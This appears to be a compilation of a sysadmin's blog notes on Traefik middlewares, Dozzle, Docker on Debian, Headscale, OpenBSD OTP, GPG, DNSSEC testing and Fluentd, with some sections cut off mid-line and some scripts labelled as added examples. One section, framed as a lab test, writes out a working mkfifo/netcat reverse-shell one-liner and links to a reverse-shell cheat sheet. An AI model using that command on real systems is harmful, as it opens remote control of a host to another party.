Docker - Traefik - Stripprefix

Strip Prefix

Let's assume you have a URL "https://whoami.your.domain.de/removeme" and want to get rid of the "removeme" part before the request is passed on to the web server. StripPrefix is your friend.

docker-compose.yml

    whoami:
      image: containous/whoami
      labels:
        - "traefik.enable=true"
        - "traefik.http.middlewares.test-stripprefix.stripprefix.prefixes=/wegdamit,/removeme"
        - "traefik.http.routers.whoami.middlewares=test-stripprefix@docker"
        - "traefik.http.routers.whoami.rule=Host(`whoami.your.domain.de`)"
        - "traefik.http.routers.whoami.tls.certresolver=letsencrypt"
        - "traefik.http.routers.whoami.tls=true"

The middleware removes the first listed prefix that matches the start of the request path (here /wegdamit or /removeme) and tells the backend which prefix it removed in the X-Forwarded-Prefix header, so an application that builds absolute links can still produce the external path. Since the router rule matches on Host() only, the router also catches requests that carry none of the prefixes; if the prefix is meant to be mandatory, add a PathPrefix() condition to the rule so that only those requests are routed here. (The containous/whoami image has since moved to traefik/whoami.)

sha256: 0620c0c2d7ae033f2536f6797a048772e52a09119367f4864f8bb2a754d2ea57

Docker - Traefik - Ratelimiting

docker-compose.yml

Let's limit the requests to 10 requests per 10 seconds. Traefik computes the allowed rate as average/period, so this is one request per second on average; burst is how many requests may pass back to back before that rate applies.

    whoami:
      image: containous/whoami
      labels:
        - "traefik.enable=true"
        - "traefik.http.middlewares.test-ratelimit.ratelimit.average=10"
        - "traefik.http.middlewares.test-ratelimit.ratelimit.burst=0"
        - "traefik.http.middlewares.test-ratelimit.ratelimit.period=10s"
        - "traefik.http.routers.whoami.middlewares=test-ratelimit@docker"
        - "traefik.http.routers.whoami.rule=Host(`whoami.your.domain.de`)"
        - "traefik.http.routers.whoami.tls.certresolver=letsencrypt"
        - "traefik.http.routers.whoami.tls=true"

Two things to keep in mind: Traefik clamps burst to at least 1, so burst=0 behaves like the default of 1 (one request goes through immediately, every further request within the same second gets a 429), and the limit is applied per client IP by default. If Traefik sits behind another proxy or load balancer, all clients share that proxy's address and hit one shared bucket; set the middleware's sourceCriterion.ipStrategy.depth so the real client address is used.

Restart the container

    docker compose -f docker-compose.yml up -d

Test limiting with curl

    user@docker:~$ while true; do echo $(date); curl -s https://whoami.your.domain.de |grep "Too" ; sleep 0.1; done
    Wed Oct 12 18:43:57 CEST 2022
    Too Many Requests
    Wed Oct 12 18:43:58 CEST 2022
    Too Many Requests
    Wed Oct 12 18:43:58 CEST 2022
    Too Many Requests

Test the limit with hey: 10 concurrent, 100 requests, 10 concurrent, wait 1 second between polls
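To see which requests of a burst would get a 429 without hammering a live router, here is a small token-bucket model of the ratelimit middleware. It is an added example, not code from the original post or from Traefik; it assumes Traefik refills at average/period tokens per second, that the bucket holds at most burst tokens and starts full, and that an accepted request costs one token while a rejected one costs nothing (the semantics of the golang.org/x/time/rate limiter Traefik builds on). The request timestamps are constructed and must be non-decreasing.

```shell
#!/bin/sh
# Added example (not from the original post): token-bucket model of Traefik's
# ratelimit middleware. Assumptions: refill rate = average/period per second,
# capacity = burst tokens, bucket starts full, an accepted request costs one
# token, a rejected request costs nothing (golang.org/x/time/rate semantics).

# ratelimit_sim AVERAGE PERIOD_MS BURST "t1 t2 ..."   (request times in ms, ascending)
# prints one status per request: 200 (passed) or 429 (rate limited)
ratelimit_sim() {
    average=$1 period=$2 burst=$3 times=$4
    # Integer arithmetic only: tokens are scaled by PERIOD, so each elapsed
    # millisecond adds AVERAGE units and one request costs PERIOD units.
    echo "$times" | awk -v avg="$average" -v per="$period" -v burst="$burst" '
    BEGIN { cap = burst * per; tokens = cap; last = 0; out = "" }
    {
        for (i = 1; i <= NF; i++) {
            t = $i + 0
            tokens += (t - last) * avg          # refill for the elapsed time
            if (tokens > cap) tokens = cap      # the bucket never overflows
            last = t
            if (tokens >= per) { tokens -= per; status = 200 }
            else               { status = 429 }
            out = out (out == "" ? "" : " ") status
        }
    }
    END { print out }'
}

# Constructed traffic: the post's setting (average=10, period=10s, i.e. one
# request per second; burst=0 is clamped to 1) hit every 100 ms like the curl
# loop above, then the same traffic with burst=5.
echo "burst=1: $(ratelimit_sim 10 10000 1 '0 100 200 1000 1100 2500')"
echo "burst=5: $(ratelimit_sim 10 10000 5 '0 100 200 300 400 500 1000')"
```

With burst=1 only the first request and the ones arriving a full second after the last accepted one pass, which is exactly the stream of "Too Many Requests" the curl loop shows; with burst=5 the first five requests go through back to back and the 1 req/s average takes over afterwards.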

Docker - Dozzle - Realtime Logs

Dozzle is a real-time log viewer for Docker containers.

URL

    https://dozzle.dev/
    https://github.com/amir20/dozzle

Pull the image and start the container

    docker pull amir20/dozzle:latest
    docker run --name dozzle -d --volume=/var/run/docker.sock:/var/run/docker.sock -p 8888:8080 amir20/dozzle:latest

Docker Compose

    version: "3"
    services:
      dozzle:
        container_name: dozzle
        image: amir20/dozzle:latest
        volumes:
          - /var/run/docker.sock:/var/run/docker.sock
        ports:
          - 8888:8080

You're now exposing all your container logs to the Internet on port 8888, without any authentication. Apply some firewall rules on the host, at the cloud provider or wherever it fits for you. If the viewer is only needed locally or behind an authenticating reverse proxy, publish the port on the loopback address instead (127.0.0.1:8888:8080) rather than on all interfaces. Keep in mind that the container also holds the Docker socket, which amounts to root on the host, so exposing the viewer is exposing the host.

Docker on Debian

Let's set up Docker on Debian

    https://docs.docker.com/engine/install/debian/
    https://www.youtube.com/watch?app=desktop&v=PgICQblfWeY

Get Debian at some cloud provider

Update apt and install the prerequisites

    apt-get update
    apt-get install ca-certificates curl gnupg lsb-release

Add the official GPG key

    mkdir -p /etc/apt/keyrings
    curl -fsSL https://download.docker.com/linux/debian/gpg |gpg --dearmor -o /etc/apt/keyrings/docker.gpg

This key is what apt will trust for every package from the repo, so compare the fingerprint of the downloaded keyring with the one Docker publishes in its install docs (9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88) before going on.

Add the repo to the sources

    echo \
      "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/debian \
      $(lsb_release -cs) stable" |tee /etc/apt/sources.list.d/docker.list > /dev/null

Install Docker Engine

    apt-get update
    apt-get install docker-ce docker-ce-cli containerd.io docker-compose-plugin

Check the version

    docker version
    root@docker:~# docker version
    Client: Docker Engine - Community
     Version: 20.

Hugo - Start

GoHugo from scratch

    https://gohugo.io/

Take a fresh VM with OpenBSD ;) Otherwise you have to adapt the steps accordingly.

Install packages

Log in as a user who is part of the "wheel" group; doas should allow all users of the wheel group to become root.

    doas pkg_add hugo-- nginx--

Add the user webmaster

Create a user "webmaster" and prepare the virtual directories.

    doas adduser webmaster
    doas mkdir /var/www/virtual
    doas chown webmaster /var/www/virtual/

Update nginx

We need to modify nginx, prepare a site folder and a basic config for the web server.

Headscale - Real World Example

Tailscale on the public Internet

Setup

Let's build a few machines around the world and get our hands dirty with headscale / tailscale.

    headscale   amsterdam
    tailscale   stockholm
                miami
                singapore
                sydney

The goal is to build a full-mesh network with all 4 tailscale clients.

Headscale server

Install OpenBSD 7.2 (needs golang 1.19) as described here.

Generate an install key

Let's generate a reusable pre-auth key for all 4 clients. It's valid for 1 hour. A reusable key enrols every node that presents it while it is valid, so treat it like a password: keep the expiry short and expire it once the clients are joined.

Headscale - OpenBSD

Running the Headscale server on OpenBSD

I like and widely use WireGuard for my infrastructure. I'm also aware of its limitations and I know the Tailscale project, but never gave it a try. Recently I stumbled upon the headscale project, an open-source alternative to the (closed) Tailscale server. Perfect, let's give it a try! And, of course, I'm going to implement this on OpenBSD, what else ;)

Docs

    https://github.com/juanfont/headscale/blob/main/docs/running-headscale-openbsd.md
    https://zakaria.org/posts/headscale-setup.md

On the server

Compile and install the server. This is working on OpenBSD 7.

OpenBSD & OTP

I don't like SSH with password authentication. But sometimes, especially during setup or recovery, it's needed and makes sense. So I thought I'd protect some boxes with OTP. Here are a few notes and instructions.

Build login_otp

    git clone https://github.com/reyk/login_otp
    cd login_otp
    make obj
    make all
    doas make install

Initialize the OTP DB

    doas otp -i

Generate a key for the user

    otp -g
    Name: stoege
    Key:  xxxx xxxx xxxx xxxx xxxx xxxx xx
    URL:  otpauth://totp/stoege?secret=xxxxxxxxxxxxxxxxxxxxxxxxxx&issuer=&algorithm=SHA1&digits=6&period=30

The secret in that URL is the whole authentication factor, so build the QR code locally rather than pasting the URL into some web-based generator.

Build the QR code

    echo "otpauth://totp/stoege?

Url Shortener for CLI

CLI URL shortener

I wrote a little URL shortener in Python with FastAPI and a wrapper script for CLI usage. It needs the httpie and jq packages. The Python backend is under development; the CLI wrappers for different OSes are right here.

Usage

    somehost$ ./myurlshort
    usage: /usr/local/bin/myurlshort http://veeeeeeeeeeeeeeeeeeeeeeeeeery.long.url.to

    anyhost$ ./myurlshort http://my-url-to-short.egal.world.planet.universe
    https://url.stoege.net/xXxXx

CLI wrappers

OpenBSD

    cat << 'EOF' > myurlshort
    #!/usr/bin/env bash
    # url shortener for openbsd, v1.0, 2022-09-12, by @stoege
    # abort when a dependency is missing instead of only printing the hint and carrying on
    which jq >/dev/null || { echo -e "*** jq not installed ***\ndoas pkg_add jq\n"; exit 1; }
    which https >/dev/null || { echo -e "*** httpie not installed ***\ndoas pkg_add httpie\n"; exit 1; }
    if [[ $# -ne 1 ]]; then
      echo -e "\nusage: $0 http://veeeeeeeeeeeeeeeeeeeeeeeeeery.

macOS

Some adaptions for macOS

Shell

macOS has been using zsh as its default shell for a while. If you want to switch back to bash, here are some notes. Note that /bin/bash on macOS is the old 3.2 release; a current bash comes from brew.

Switch to bash

    chsh -s /bin/bash

Install brew

The famous package manager for macOS. It's a curl-pipe-to-bash installer, so read the script before running it.

    /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

Install keychain

If you work with ssh-agent, you may want to try keychain.

    brew install keychain

Build .bash_profile

This will overwrite your existing .bash_profile, so a timestamped backup is taken first.

    cp ~/.bash_profile ~/.bash_profile.$(date "+%s")~
    cat << 'EOF' > ~/.

GPG & Gopass & Gitlab

GPG and how to use it

Create a key with ECC

    gpg --expert --full-generate-key
    (9) ECC and ECC
    (1) Curve 25519
    0 = key does not expire (or whatever you prefer!)
    Real name: Max Muster
    Email address: max@muster.net
    Comment: -

    pub   ed25519 2022-09-04 [SC]
          256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
    uid                      Max Muster (-) <max@muster.net>
    sub   cv25519 2022-09-04 [E]

This gives an ed25519 primary key for signing and certification [SC] plus a cv25519 subkey for encryption [E]. A non-expiring key is convenient, but an expiry (for example one year) limits the lifetime of a lost or leaked key and can be extended at any time with the private key, so it costs little.

Public key

    max@host $ gpg
    /home/max/.gnupg/pubring.kbx
    ----------------------------
    pub   ed25519 2022-09-04 [SC]
          256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
    uid           [ultimate] Max Muster (-) <max@muster.
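The interactive dialogue above is hard to reproduce on many machines or in a script. The same ed25519/cv25519 key can be described in a GnuPG batch parameter file ("Unattended key generation" in the GnuPG manual). The script below is an added example, not part of the original post: it generates such a parameter file for a name, e-mail and expiry, and checks a parameter file for the two mistakes that matter (wrong algorithms for Curve 25519, or a key deliberately left without a passphrase). The identity is the post's sample "Max Muster"; the one-year expiry is this example's choice, the post used 0.

```shell
#!/bin/sh
# Added example, not from the original post: unattended GnuPG key generation
# equivalent to "(9) ECC and ECC, (1) Curve 25519" in the interactive dialogue.

# gpg_batch_params NAME EMAIL EXPIRE  ->  prints a gpg --batch parameter file
gpg_batch_params() {
    cat <<EOF
%echo generating ed25519 signing key with cv25519 encryption subkey
Key-Type: eddsa
Key-Curve: ed25519
Key-Usage: sign
Subkey-Type: ecdh
Subkey-Curve: cv25519
Subkey-Usage: encrypt
Name-Real: $1
Name-Email: $2
Expire-Date: $3
%commit
%echo done
EOF
}

# gpg_batch_check "<parameter file>"  ->  ok | ok-no-expiry | bad-algorithms | unprotected-key
# Curve 25519 keys must use eddsa/ed25519 for signing and ecdh/cv25519 for
# encryption; %no-protection would store the private key without a passphrase.
gpg_batch_check() {
    printf '%s\n' "$1" | awk '
        /^Key-Type: eddsa$/       { kt = 1 }
        /^Key-Curve: ed25519$/    { kc = 1 }
        /^Subkey-Type: ecdh$/     { st = 1 }
        /^Subkey-Curve: cv25519$/ { sc = 1 }
        /^Expire-Date: 0$/        { noexp = 1 }
        /^%no-protection$/        { nopass = 1 }
        END {
            if (!(kt && kc && st && sc)) { print "bad-algorithms"; exit 1 }
            if (nopass)                  { print "unprotected-key"; exit 1 }
            if (noexp)                   { print "ok-no-expiry"; exit 0 }
            print "ok"; exit 0
        }'
}

params=$(gpg_batch_params "Max Muster" "max@muster.net" "1y")
echo "$params"
echo "check: $(gpg_batch_check "$params")"

# To actually create the key (only where gpg is installed): it prompts for the
# passphrase through pinentry because %no-protection is deliberately absent.
#   echo "$params" | gpg --batch --generate-key
```

The check also reports a key without expiry as ok-no-expiry rather than as an error, matching the post's "or whatever you prefer"; an unprotected key is rejected because the passphrase is the only thing standing between a copied ~/.gnupg and a usable signing key.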

OpenBSD - ReverseShell

Reverse shells

    https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
    https://kb.systemoverlord.com/security/postex/reverse/

Test it

Set up a listener on host A (192.168.1.100)

    hostA # nc -l 4242

Start the reverse shell on host B

    hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f

Here we are: the prompt on host A now belongs to host B

    hostA # hostname
    hostA.somewhere
    hostA # nc -l 4242
    hostB # hostname
    hostB.somewhere

Nice ;)

The FIFO closes the loop: nc writes whatever arrives from host A into /tmp/f, the shell reads its commands from there, and the shell's output (stderr merged into stdout with 2>&1) flows through the pipe back into nc. Everything crosses the wire in cleartext, and with the default umask the FIFO in /tmp is world-readable, so another local user could read commands out of it. Fine for a lab test between your own boxes, not something to leave behind.

sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

PuffyPages

Some cool pages about OpenBSD

    https://www.openbsd.org
    https://man.openbsd.org
    https://www.openbsdfoundation.org
    https://marc.info
    https://undeadly.org/cgi?action=front
    https://bsdly.blogspot.com/
    https://obsd.solutions/en/blog/
    https://dataswamp.org/~solene/
    https://blog.apnic.net/2021/10/28/openbsd-part-1-how-it-all-started/
    https://blog.apnic.net/2021/11/05/openbsd-part-2-why-use-openbsd/
    https://vincentdelft.be/category/openbsd
    http://ratfactor.com/openbsd/2022-08-02-install
    https://blog.lambda.cx/tags/openbsd/
    https://www.openbsdjumpstart.org/#/
    https://blog.lambda.cx/posts/openbsd-introduction-talk/openbsd-introduction.pdf
    https://why-openbsd.rocks/fact/
    https://openbsdrouterguide.net/
    https://blog.obtusenet.com/
    http://kestrel.nmt.edu/~raymond/software/howtos/openbsd.html

sha256: a86099a13463c50993ce9fa2d75543daf1888454259f04daab6240c8a6dec7e9

DNSSEC - OARC Size Tester

Talk from @mwl at BSDCan 2022

    https://www.youtube.com/watch?v=1n62VZj-CKI

OARC reply size tester

The tester answers with increasingly large DNS replies and reports, in the final TXT records, the largest size that made it back to your resolver and the EDNS buffer size your resolver advertised.

    dig +short rs.dns-oarc.net TXT

Host1 - good :)

    # dig +short rs.dns-oarc.net TXT
    rst.x4090.rs.dns-oarc.net.
    rst.x4058.x4090.rs.dns-oarc.net.
    rst.x4064.x4058.x4090.rs.dns-oarc.net.
    "45.15.80.80 DNS reply size limit is at least 4090"
    "45.15.80.80 sent EDNS buffer size 4096"

Host2 - bad :(

    # dig +short rs.dns-oarc.net TXT
    rst.x1196.rs.dns-oarc.net.
    rst.x1206.x1196.rs.dns-oarc.net.
    rst.x1204.x1206.x1196.rs.dns-oarc.net.
    "74.63.25.240 DNS reply size limit is at least 1206"
    "74.63.25.240 sent EDNS buffer size 1232"

Host2's resolver advertises a 1232-byte buffer (the DNS flag day 2020 default), but the largest reply the tester saw come through was 1206 bytes, so anything bigger, which DNSSEC-signed answers often are, has to rely on TCP fallback working end to end.

sha256: 110b220f93eff767b7e4d488294b00ede4f4509258d0148704b145df79fa9821
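Reading the two TXT records by eye is fine for two hosts; for a fleet it is easier to parse them. The function below is an added example, not part of the original post: it takes the output of dig +short rs.dns-oarc.net TXT, pulls out the measured reply size limit and the advertised EDNS buffer size, and gives a verdict against a minimum of 1232 bytes (the flag day 2020 recommendation; the threshold is this example's assumption and is adjustable). The two sample outputs are copied from the post's Host1 and Host2 above.

```shell
#!/bin/sh
# Added example, not from the original post: parse the OARC reply size tester
# output and judge the resolver's effective reply size.
# Assumption: a resolver should get at least 1232-byte replies through.

# oarc_verdict "<dig output>" [MIN_BYTES]
#   -> "ok LIMIT BUFFER", "bad LIMIT BUFFER" or "unknown" (no tester records)
oarc_verdict() {
    min=${2:-1232}
    printf '%s\n' "$1" | awk -v min="$min" '
        { gsub(/"/, "") }                                   # strip TXT quotes, re-split fields
        /DNS reply size limit is at least/ { limit = $NF }  # largest reply that arrived
        /sent EDNS buffer size/            { buf = $NF }    # what the resolver advertised
        END {
            if (limit == "") { print "unknown"; exit 0 }
            if (limit + 0 >= min) print "ok", limit, buf
            else                  print "bad", limit, buf
        }'
}

# Constructed samples, copied from the post's two hosts.
HOST1='rst.x4090.rs.dns-oarc.net.
rst.x4058.x4090.rs.dns-oarc.net.
rst.x4064.x4058.x4090.rs.dns-oarc.net.
"45.15.80.80 DNS reply size limit is at least 4090"
"45.15.80.80 sent EDNS buffer size 4096"'

HOST2='rst.x1196.rs.dns-oarc.net.
rst.x1206.x1196.rs.dns-oarc.net.
rst.x1204.x1206.x1196.rs.dns-oarc.net.
"74.63.25.240 DNS reply size limit is at least 1206"
"74.63.25.240 sent EDNS buffer size 1232"'

echo "host1: $(oarc_verdict "$HOST1")"
echo "host2: $(oarc_verdict "$HOST2")"
echo "empty: $(oarc_verdict "")"
# Live use on a host with dig:  oarc_verdict "$(dig +short rs.dns-oarc.net TXT)"
```

The verdict deliberately reports both numbers: a measured limit below the advertised buffer, as on Host2, means something on the path (a firewall dropping fragments, a middlebox clamping UDP) is silently discarding replies the resolver believes it can receive.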

Fluent - Data Collector

Fluentd is an open-source data collector for a unified logging layer. It lets you unify data collection and consumption for better use and understanding of your data.

Docs

    https://docs.fluentd.org/
    http://fluentular.herokuapp.com/

Install Ruby

    pkg_add ruby-3.1.2

Set symlinks

OpenBSD installs the Ruby executables with a version suffix; link the unversioned names to the 3.1 ones. (The original racc, rbs and rdbg links pointed at rdoc31, which is corrected here.)

    ln -sf /usr/local/bin/ruby31 /usr/local/bin/ruby
    ln -sf /usr/local/bin/bundle31 /usr/local/bin/bundle
    ln -sf /usr/local/bin/bundler31 /usr/local/bin/bundler
    ln -sf /usr/local/bin/erb31 /usr/local/bin/erb
    ln -sf /usr/local/bin/gem31 /usr/local/bin/gem
    ln -sf /usr/local/bin/irb31 /usr/local/bin/irb
    ln -sf /usr/local/bin/racc31 /usr/local/bin/racc
    ln -sf /usr/local/bin/rake31 /usr/local/bin/rake
    ln -sf /usr/local/bin/rbs31 /usr/local/bin/rbs
    ln -sf /usr/local/bin/rdbg31 /usr/local/bin/rdbg
    ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdoc
    ln -sf /usr/local/bin/ri31 /usr/local/bin/ri
    ln -sf /usr/local/bin/typeprof31 /usr/local/bin/typeprof

Install Fluentd

gem install fetches fluentd and all its dependencies straight from rubygems.org as root; pin the version you tested rather than taking whatever is newest on the day.

    gem install fluentd

More symlinks

    ln -sf /usr/local/bin/fluentd31 /usr/local/bin/fluentd

Create the config

    fluentd --setup /etc/fluent

Edit the config

    cat << 'EOF' > /etc/fluent/fluent.
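The hand-written ln -sf lines above are one pattern, "link every versioned binary to its bare name", and the copy-paste slips in the original list show why that is better done by a loop. The function below is an added example, not part of the original post: it links every DIR/name<SUFFIX> to DIR/name, refuses to clobber a real file that is not already a symlink, and is demonstrated on fake binaries in a temporary directory rather than on /usr/local/bin. It assumes, as the post does, that OpenBSD's ruby-3.1 package names its executables with a 31 suffix.

```shell
#!/bin/sh
# Added example, not from the original post: generalisation of the ln -sf
# list. Assumption: versioned executables are named <name><SUFFIX>, e.g. gem31.

# link_versioned_bins DIR SUFFIX
#   creates DIR/<name> -> DIR/<name><SUFFIX> for every DIR/<name><SUFFIX>
#   and prints the number of links created or refreshed
link_versioned_bins() {
    dir=$1 suffix=$2 n=0
    for target in "$dir"/*"$suffix"; do
        [ -e "$target" ] || continue                 # no match: the glob stayed literal
        link=${target%"$suffix"}
        if [ -e "$link" ] && [ ! -L "$link" ]; then
            # a real file or directory owns that name; never replace it silently
            echo "skip $link: exists and is not a symlink" >&2
            continue
        fi
        ln -sf "$target" "$link"                     # -f refreshes an existing symlink
        n=$((n + 1))
    done
    echo "$n"
}

# Constructed demo: fake versioned binaries in a temp dir instead of /usr/local/bin.
demo_dir=$(mktemp -d)
for b in ruby31 gem31 racc31 rdoc31 fluentd31; do : > "$demo_dir/$b"; done
: > "$demo_dir/python"          # unrelated real file, must be left alone
echo "links made: $(link_versioned_bins "$demo_dir" 31)"
ls -l "$demo_dir"
rm -rf "$demo_dir"
```

Run it as root against /usr/local/bin with suffix 31 after pkg_add and after gem install (for fluentd31); running it twice is harmless because existing symlinks are simply refreshed.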